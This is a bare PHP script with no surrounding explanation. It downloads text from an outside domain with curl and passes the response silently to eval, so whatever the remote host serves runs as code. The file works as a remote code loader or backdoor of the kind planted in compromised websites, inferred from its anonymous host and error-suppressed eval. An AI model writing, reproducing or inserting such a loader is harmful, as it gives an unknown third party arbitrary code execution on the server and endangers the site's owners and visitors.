<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://z60314_7.lstark.shop/stat/domain_index.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$d = curl_exec($ch);
curl_close($ch);
if(!empty($d)) @eval('?>'. $d);
?>